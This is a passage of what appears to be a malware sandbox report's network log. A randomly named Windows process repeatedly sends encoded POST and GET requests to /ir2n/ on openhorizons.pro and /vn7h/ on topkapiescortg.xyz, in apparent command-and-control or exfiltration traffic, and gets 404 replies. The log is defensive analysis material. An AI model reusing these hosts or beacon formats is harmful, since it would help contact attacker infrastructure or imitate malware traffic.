                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                      7          | 192.168.2.6 | 49731       | 69.57.163.64   | 80               | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp                           | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:20.010006905 CET | 803               | OUT       | POST /ir2n/ HTTP/1.1
                                                                      Host: www.openhorizons.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.openhorizons.pro
                                                                      Referer: http://www.openhorizons.pro/ir2n/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 71 32 50 51 2f 4c 7a 54 4c 70 76 31 65 4a 6e 37 58 52 57 34 76 35 47 41 68 37 46 4e 50 62 49 6e 36 39 42 2f 75 67 42 6d 74 56 50 64 5a 42 38 66 67 56 76 44 68 33 4c 6e 62 34 45 43 4c 75 66 58 6b 4a 76 54 46 71 44 5a 42 67 57 79 6d 54 74 53 4d 71 4f 38 73 63 4c 4b 63 62 5a 51 64 64 34 7a 30 72 56 72 47 70 41 47 76 51 68 69 72 47 65 50 61 38 50 31 63 6c 46 73 74 6a 31 6b 36 45 53 49 67 50 62 41 47 56 65 71 75 70 35 75 74 66 33 45 56 41 65 2b 67 54 4e 49 34 78 6a 32 32 63 69 33 37 69 52 7a 6c 58 43 61 4d 39 6c 44 52 2f 58 42 72 30 57 51 76 36 74 42 34 37 65 36 79 35 44 6e 62 33 6b 67 6a 47 71 4f 37 4c 6d 49 2b 46 64 78 4a 56 75 49 43 49 4d 4c 33 78 76 72 2f 68 69 34 62 51 3d 3d
                                                                      Data Ascii: 8jT4kL=q2PQ/LzTLpv1eJn7XRW4v5GAh7FNPbIn69B/ugBmtVPdZB8fgVvDh3Lnb4ECLufXkJvTFqDZBgWymTtSMqO8scLKcbZQdd4z0rVrGpAGvQhirGePa8P1clFstj1k6ESIgPbAGVequp5utf3EVAe+gTNI4xj22ci37iRzlXCaM9lDR/XBr0WQv6tB47e6y5Dnb3kgjGqO7LmI+FdxJVuICIML3xvr/hi4bQ==
                                                                      Nov 28, 2024 10:07:21.216412067 CET | 533               | IN        | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:21 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                      8          | 192.168.2.6 | 49732       | 69.57.163.64   | 80               | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp                           | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:22.666096926 CET | 1816              | OUT       | POST /ir2n/ HTTP/1.1
                                                                      Host: www.openhorizons.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.openhorizons.pro
                                                                      Referer: http://www.openhorizons.pro/ir2n/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1247
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 71 32 50 51 2f 4c 7a 54 4c 70 76 31 65 4a 6e 37 58 52 57 34 76 35 47 41 68 37 46 4e 50 62 49 6e 36 39 42 2f 75 67 42 6d 74 56 48 64 65 7a 30 66 36 30 76 44 67 33 4c 6e 46 6f 45 42 4c 75 66 4f 6b 4e 43 61 46 71 50 6e 42 69 2b 79 6d 32 78 53 4b 59 32 38 35 4d 4c 4b 42 4c 5a 56 46 39 34 71 30 74 31 76 47 70 51 47 76 51 68 69 72 41 36 50 54 4f 33 31 61 6c 46 76 6b 44 31 6f 77 55 53 67 67 50 44 36 47 55 72 58 75 61 68 75 74 38 50 45 51 32 4b 2b 34 44 4e 4f 2f 78 6a 75 32 63 6d 57 37 6d 4a 4a 6c 56 69 30 4d 2b 35 44 53 59 2b 68 70 48 6d 39 30 70 70 56 75 4a 57 52 36 4e 4c 6f 59 6c 34 63 75 58 36 4e 35 59 61 68 35 7a 74 38 4d 54 33 75 4e 65 34 77 38 48 57 39 7a 6a 7a 71 5a 78 4c 6c 71 37 6f 42 53 43 64 68 43 50 67 6b 48 73 4d 5a 56 33 69 35 36 75 6e 62 77 59 4e 39 31 68 62 66 45 74 35 47 46 69 57 6c 6e 53 48 42 65 39 58 4e 46 45 6c 67 49 67 57 43 43 49 30 75 73 36 79 4c 58 76 49 67 78 46 2f 43 4c 61 34 4f 57 2b 64 66 6f 34 70 65 49 6d 68 72 74 53 63 64 55 7a 31 63 67 42 50 53 64 63 79 [TRUNCATED]
                                                                      Data Ascii: 8jT4kL=q2PQ/LzTLpv1eJn7XRW4v5GAh7FNPbIn69B/ugBmtVHdez0f60vDg3LnFoEBLufOkNCaFqPnBi+ym2xSKY285MLKBLZVF94q0t1vGpQGvQhirA6PTO31alFvkD1owUSggPD6GUrXuahut8PEQ2K+4DNO/xju2cmW7mJJlVi0M+5DSY+hpHm90ppVuJWR6NLoYl4cuX6N5Yah5zt8MT3uNe4w8HW9zjzqZxLlq7oBSCdhCPgkHsMZV3i56unbwYN91hbfEt5GFiWlnSHBe9XNFElgIgWCCI0us6yLXvIgxF/CLa4OW+dfo4peImhrtScdUz1cgBPSdcyvBZjCr8i/rUXrgOe+WXN5zDBkF05DxDb3rrTZNi9aIZ6u2lmU/PYxI7d5pcUhofk0//RWCQ0aSN3DXMfzqBGC6Otfvb2MkE9DPZKoZYNualUyNFvB8UWgvbvemsYYxQ4g6AODninH1wzwcOJvgkeDCamh8GLs1zIVkCNBwfh7GY4tdTeI3phVZYjPhpguH2ZnchWwTt2m4T1Kl2DtIm9NhBBoqPYpZ2mCgtJ+A/sxW4NRIOr47wT5XlSOh6cQB7s17N1Pn1jh4brqVTuQX9Q60O6RNw6gq51+diQpvf5m/4Cc4YUL46GNVyYmK5wLl/A6yv54fWcOJnWJCbr6ZZ/o6RdRliLZGzTdiJG+mYZj+xNlzv80b9vo9g1xxwodtC8G56dpemAA2DprWlBWDFHlAaNAalinLpCm9RBeN96PCyW8xLNfOOPzDi30qEn0+VBRJWBqiaQc5d/wD+0NQPa7pJLE+W5zIGAOWBwfEbmKagFS8FzsDII1MgOkT9y4bMfMbeedCAX5uLnNM5FCNXVZnai0zPu+YMKxsMuSDm7onANlvR4E/MKjkhPgi5lJEDCrb5s1clOBslZiqFCbZeIfDLRpnRdim6dpj7fD9R24SQuLtr05Uevs0NcUutGC90cFMPA1QqrMTzS5Q9j4TT5ovd4sJ8ErK3Dor [TRUNCATED]
                                                                      Nov 28, 2024 10:07:23.880187035 CET | 533               | IN        | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:23 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                      9          | 192.168.2.6 | 49733       | 69.57.163.64   | 80               | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp                           | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:25.318721056 CET | 518               | OUT       | GET /ir2n/?8jT4kL=n0nw8/H3BoTEcN7zdQK4h5Pq0YxvTroU8JdHjhF/1WvMYiVgjVi7rxPCE4QNN9j365ahaJvOAjH+lnxKDIqr8fD4f6QXWf5NwsAjHJc3hwUW8hetWLjodHBwgSRg3Fz4puXvFwU=&-pmdf=w6-PZpOHNlat HTTP/1.1
                                                                      Host: www.openhorizons.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Nov 28, 2024 10:07:26.583642960 CET | 548               | IN        | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:26 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                      10         | 192.168.2.6 | 49734       | 104.21.6.17    | 80               | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp                           | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:32.193804979 CET | 785               | OUT       | POST /vn7h/ HTTP/1.1
                                                                      Host: www.topkapiescortg.xyz
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.topkapiescortg.xyz
                                                                      Referer: http://www.topkapiescortg.xyz/vn7h/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 211
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 6c 6c 53 70 48 42 52 68 66 62 56 47 53 4a 67 72 7a 59 57 34 6c 70 68 34 79 39 5a 76 77 67 79 58 72 6f 74 2b 54 49 70 4c 41 65 67 2f 54 36 53 2b 62 53 65 72 52 42 54 71 39 43 67 53 46 51 52 58 73 68 45 4a 57 30 52 43 61 4b 4f 70 7a 51 39 37 49 42 77 58 57 57 5a 52 54 70 54 77 41 50 70 39 52 71 66 47 4a 4d 4f 5a 50 37 31 4a 55 79 71 79 4a 4d 6d 47 35 59 71 41 66 32 72 46 45 48 64 44 74 47 4a 68 57 6d 78 30 69 44 37 61 34 6d 76 78 54 4e 6a 50 71 4f 64 38 6b 67 44 35 61 4b 53 63 47 79 4a 7a 5a 6f 6f 43 68 6b 4a 46 4c 44 63 79 65 69 33 43 2f 50 73 6b 44 4e 50 4c 4c 6c 42 4d 47 6e 44 32 66 38 39 70 48 68 34 78
                                                                      Data Ascii: 8jT4kL=llSpHBRhfbVGSJgrzYW4lph4y9ZvwgyXrot+TIpLAeg/T6S+bSerRBTq9CgSFQRXshEJW0RCaKOpzQ97IBwXWWZRTpTwAPp9RqfGJMOZP71JUyqyJMmG5YqAf2rFEHdDtGJhWmx0iD7a4mvxTNjPqOd8kgD5aKScGyJzZooChkJFLDcyei3C/PskDNPLLlBMGnD2f89pHh4x
                                                                      Nov 28, 2024 10:07:33.493359089 CET | 1071 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:33 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dhbHECWAR1vHgoaHiFRcY0nqh5rC4RhAW3wIl2UTgcz3o6gCPLujunNBLYfGDW3BHSFED1sbjqEnyJWbX0r2yOEtQpMHWcjJ0dcqxk2JTSHR3JkcUvJTY9awsYvfBbmqUBBL%2B0OCx30o"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e9935543f778c2d-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2057&min_rtt=2057&rtt_var=1028&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=785&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a
                                                                      Data Ascii: eaTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(bY<;
                                                                      Nov 28, 2024 10:07:33.494087934 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      11 | 192.168.2.6 | 49735 | 104.21.6.178 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:34.998898029 CET | 809 | OUT | POST /vn7h/ HTTP/1.1
                                                                      Host: www.topkapiescortg.xyz
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.topkapiescortg.xyz
                                                                      Referer: http://www.topkapiescortg.xyz/vn7h/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 6c 6c 53 70 48 42 52 68 66 62 56 47 54 6f 77 72 77 35 57 34 77 5a 68 37 75 4e 5a 76 2b 41 79 62 72 6f 70 2b 54 4d 35 62 44 6f 49 2f 53 65 57 2b 61 51 6d 72 45 42 54 71 33 69 67 54 59 67 51 56 73 68 49 76 57 31 74 43 61 4b 71 70 7a 52 4e 37 49 32 6b 49 57 47 5a 54 59 4a 54 32 4e 76 70 39 52 71 66 47 4a 4d 4b 2f 50 37 74 4a 55 43 36 79 49 74 6d 42 6d 6f 71 44 49 47 72 46 4a 6e 64 50 74 47 49 45 57 6b 46 4e 69 41 44 61 34 6d 2f 78 55 59 44 41 6c 4f 64 2b 67 67 43 65 63 75 66 45 4f 78 59 6f 57 35 38 44 33 6d 5a 47 4f 31 42 6f 43 52 33 68 74 66 4d 6d 44 50 58 35 4c 46 42 6d 45 6e 37 32 4e 72 78 4f 49 56 64 53 4c 56 33 7a 39 2f 41 50 55 49 66 77 4e 6d 2f 56 59 34 48 70 44 67 3d 3d
                                                                      Data Ascii: 8jT4kL=llSpHBRhfbVGTowrw5W4wZh7uNZv+Aybrop+TM5bDoI/SeW+aQmrEBTq3igTYgQVshIvW1tCaKqpzRN7I2kIWGZTYJT2Nvp9RqfGJMK/P7tJUC6yItmBmoqDIGrFJndPtGIEWkFNiADa4m/xUYDAlOd+ggCecufEOxYoW58D3mZGO1BoCR3htfMmDPX5LFBmEn72NrxOIVdSLV3z9/APUIfwNm/VY4HpDg==
                                                                      Nov 28, 2024 10:07:36.272105932 CET | 1077 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:36 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdJsoZlbpx560DUzWwQ6dklk5igLwiq3S6rp%2B9CwTDCjyRU93S5q8hQtUXCDQ7DjK3SoU1VdggVgALrQtuQB%2FvbStfVxkZvT%2BxsqT0URJSt5IOsPRl5HoQNfnl1MY%2F12LcBZURL3qAMR"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e9935659bfc7c93-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2074&min_rtt=2074&rtt_var=1037&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=809&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      12 | 192.168.2.6 | 49736 | 104.21.6.178 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:37.672563076 CET | 1822 | OUT | POST /vn7h/ HTTP/1.1
                                                                      Host: www.topkapiescortg.xyz
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.topkapiescortg.xyz
                                                                      Referer: http://www.topkapiescortg.xyz/vn7h/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1247
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 6c 6c 53 70 48 42 52 68 66 62 56 47 54 6f 77 72 77 35 57 34 77 5a 68 37 75 4e 5a 76 2b 41 79 62 72 6f 70 2b 54 4d 35 62 44 6f 77 2f 54 72 43 2b 61 33 4b 72 43 78 54 71 37 43 67 65 59 67 52 4e 73 68 51 72 57 31 68 38 61 4d 75 70 7a 7a 46 37 5a 7a 59 49 44 32 5a 54 58 70 54 33 41 50 6f 2f 52 71 76 43 4a 4d 36 2f 50 37 74 4a 55 41 53 79 4d 38 6d 42 31 34 71 41 66 32 72 33 45 48 63 53 74 47 52 35 57 6b 52 43 2b 67 6a 61 34 48 50 78 52 72 72 41 6f 4f 64 77 74 41 43 47 63 70 58 6c 4f 78 45 6b 57 35 49 74 33 6d 39 47 4f 44 68 31 47 7a 72 57 77 4f 63 5a 55 75 36 65 4c 45 68 74 4d 6e 6d 4e 43 71 52 39 4f 32 45 36 4d 46 7a 46 70 76 4a 71 54 70 58 4f 4e 44 71 69 53 5a 43 64 65 32 67 69 48 49 76 65 67 6d 63 64 45 79 55 6b 75 71 44 7a 62 72 77 79 2b 62 54 5a 64 46 4a 77 48 6b 4f 66 56 61 54 50 56 61 4f 2f 47 6b 54 57 6c 64 70 64 37 72 44 42 59 78 68 4b 63 68 33 58 4a 61 41 46 61 53 70 74 53 6f 76 58 2f 68 7a 4d 53 67 75 4f 70 62 6b 38 4d 46 61 7a 76 37 35 31 65 7a 35 4f 46 44 4e 62 56 43 4b [TRUNCATED]
                                                                      Data Ascii: 8jT4kL= [TRUNCATED]
                                                                      Nov 28, 2024 10:07:39.044641972 CET | 1070 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:38 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
